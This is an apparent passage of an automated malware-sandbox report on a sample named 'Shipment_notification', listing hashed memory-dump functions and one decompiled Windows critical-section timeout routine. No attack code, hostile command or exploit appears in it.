                                                                                • Instruction ID: 9907011812944987a0f57155395041e24ae0af26022529eede63928ee3ee1ed8
                                                                                • Opcode Fuzzy Hash: ad3ee21f8abd753a73375b71f77289d125aaf50496782c152afee5401cbb0e2b
                                                                                • Instruction Fuzzy Hash: 1490026231100402D106619D44146061009E7D1386FD1C056E1414555DC7658973B172
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29820 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: afb1c7ac6e6de260d2780560e18970f3e95e2e7cb59bf99dd9ed96a87fc7f33f
                                                                                • Instruction ID: df43e782b938f94596ca351e6101b35f0213a7598e05beab05d598ef44efd3b3
                                                                                • Opcode Fuzzy Hash: afb1c7ac6e6de260d2780560e18970f3e95e2e7cb59bf99dd9ed96a87fc7f33f
                                                                                • Instruction Fuzzy Hash: D390027225100402D145719D44046061009B7D0282FD1C056A0414554EC7958A76BAA1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B2B040 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 08d05729a154a9c7a72e01cac611ec7f3a3c47c419f3cd81af097b9fe71b4801
                                                                                • Instruction ID: e847806df78ede724b6a63889fed4d7666cdd1131e4bc033734e0c4d06048db1
                                                                                • Opcode Fuzzy Hash: 08d05729a154a9c7a72e01cac611ec7f3a3c47c419f3cd81af097b9fe71b4801
                                                                                • Instruction Fuzzy Hash: FA9002A2611140434544B19D48044066015B7E13423D1C165A0444560CC7A88875A2A5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B2A3B0 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 094a2a6a18288dcf4eb8e11efad6d6182bc83de2032d3bc18ccb3db636aee568
                                                                                • Instruction ID: 55196f1787de57637ed1569a2f819edaec951fdd5fe36749f4544f2505494748
                                                                                • Opcode Fuzzy Hash: 094a2a6a18288dcf4eb8e11efad6d6182bc83de2032d3bc18ccb3db636aee568
                                                                                • Instruction Fuzzy Hash: 1C90027221144002D144719D844460B6005B7E0342FD1C455E0415554CC7558876A261
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29730 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f716a09fdb9a640006a7838a58e7c86daf14feb10461ffc2d25fc1ff31b0679f
                                                                                • Instruction ID: 0478928f8ed52a54b63bc8f26f0dd0decf7357378fa828e84a3213cd54a95aa8
                                                                                • Opcode Fuzzy Hash: f716a09fdb9a640006a7838a58e7c86daf14feb10461ffc2d25fc1ff31b0679f
                                                                                • Instruction Fuzzy Hash: BB90026261500402D144719D54187061015A7D0242FD1D055A0014554DC7998A7576E1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B2A710 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 417c3011b420ea7d42fcf6ba507b5bf315657cce98138785419aaad9497fbc9f
                                                                                • Instruction ID: a33ea3c29237b12336503a87ad81e69d2a3bca5b76fa9b166106230394ea8abe
                                                                                • Opcode Fuzzy Hash: 417c3011b420ea7d42fcf6ba507b5bf315657cce98138785419aaad9497fbc9f
                                                                                • Instruction Fuzzy Hash: 06900272311000529504A6DD5804A4A5105A7F0342BD1D059A4004554CC69488716161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29B00 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 20c7b1c8de60ee7b83ca32ccc2976c32e3ffffdf0398d77f8a574d19027b30ac
                                                                                • Instruction ID: dc5f740eb91f802f5c9b789ea40b597effc3d7540f60d8b34b311af05fb3f054
                                                                                • Opcode Fuzzy Hash: 20c7b1c8de60ee7b83ca32ccc2976c32e3ffffdf0398d77f8a574d19027b30ac
                                                                                • Instruction Fuzzy Hash: 9390026225100802D144719D84147071006E7D0642FD1C055A0014554DC756897576F1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29770 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 1e85a5dba30ef4187471d7b63ff7b8470388d9968ccb34ef21b905d6ba458b82
                                                                                • Instruction ID: ead4b1aa912075f581719d195184daf6362d373637b283d3c40dcfc33128ab68
                                                                                • Opcode Fuzzy Hash: 1e85a5dba30ef4187471d7b63ff7b8470388d9968ccb34ef21b905d6ba458b82
                                                                                • Instruction Fuzzy Hash: 8490026221504442D104659D5408A061005A7D0246FD1D055A1054595DC7758871B171
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B2A770 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 59c9ef9b885bf403bedc3beebd6818e6ba1eed6f649d5722afcc7e825aec3f70
                                                                                • Instruction ID: ec843570ec728998d0f5c1104db42ca872e52c78f24e3d3955b29677d2c4a678
                                                                                • Opcode Fuzzy Hash: 59c9ef9b885bf403bedc3beebd6818e6ba1eed6f649d5722afcc7e825aec3f70
                                                                                • Instruction Fuzzy Hash: F990027621504442D504659D5804A871005A7D0346FD1D455A041459CDC7948871B161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29760 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 19977b43220cfd2c01da07e24975b5e54be92a1273ae0eaae604dfcd92508647
                                                                                • Instruction ID: 4d3e16b5099702f86a86e2fac6202ceed2f09076cdab77a4620e0b6cab96d4ee
                                                                                • Opcode Fuzzy Hash: 19977b43220cfd2c01da07e24975b5e54be92a1273ae0eaae604dfcd92508647
                                                                                • Instruction Fuzzy Hash: BD90027221100403D104619D55087071005A7D0242FD1D455A0414558DD79688717161
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29A80 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c9f3c34c53110b6ab52d4c59927626f969794e7e0a910a57ee106be9970a74c1
                                                                                • Instruction ID: 839618aec2fe1137a3750a2b3929540cdae28265c271f5f375cd052e68a93efe
                                                                                • Opcode Fuzzy Hash: c9f3c34c53110b6ab52d4c59927626f969794e7e0a910a57ee106be9970a74c1
                                                                                • Instruction Fuzzy Hash: F790026221144442D144629D4804B0F5105A7E1243FD1C05DA4146554CCA5588756761
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B29A10 Relevance: .0, Instructions: 4COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d83825eacf0f5ba9d06b29ce6c38624615e78376d654a9c0baf191acea0d323f
                                                                                • Instruction ID: 1cbfc1c58d36b9251b1dda047d763a61cce1d7fb3c09bd4203f88dd9232dde5e
                                                                                • Opcode Fuzzy Hash: d83825eacf0f5ba9d06b29ce6c38624615e78376d654a9c0baf191acea0d323f
                                                                                • Instruction Fuzzy Hash: 8C90027221140402D104619D48087471005A7D0343FD1C055A5154555EC7A5C8B17571
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B7FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E01B7FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = L01B2CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01B75720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01B75720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                0x01b7fdda
                                                                                0x01b7fde2
                                                                                0x01b7fde5
                                                                                0x01b7fdec
                                                                                0x01b7fdfa
                                                                                0x01b7fdff
                                                                                0x01b7fe0a
                                                                                0x01b7fe0f
                                                                                0x01b7fe17
                                                                                0x01b7fe1e
                                                                                0x01b7fe19
                                                                                0x01b7fe19
                                                                                0x01b7fe19
                                                                                0x01b7fe20
                                                                                0x01b7fe21
                                                                                0x01b7fe22
                                                                                0x01b7fe25
                                                                                0x01b7fe40

                                                                                APIs
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B7FDFA
                                                                                Strings
                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B7FE2B
                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B7FE01
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                • API String ID: 885266447-3903918235
                                                                                • Opcode ID: 1ea7caaf05b6f94ec6899ecb2ca4c7bfc5be86cf211ecf682df2a2653e07c8b4
                                                                                • Instruction ID: d973e79b016e43bae1a08c84f2acfbfbe2597a2d3c72e39274ec3a900195fcf8
                                                                                • Opcode Fuzzy Hash: 1ea7caaf05b6f94ec6899ecb2ca4c7bfc5be86cf211ecf682df2a2653e07c8b4
                                                                                • Instruction Fuzzy Hash: ABF0C232200601BBEA281A55DC02F33BF6AEB84B30F140359F638561D1DA62B92096F4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%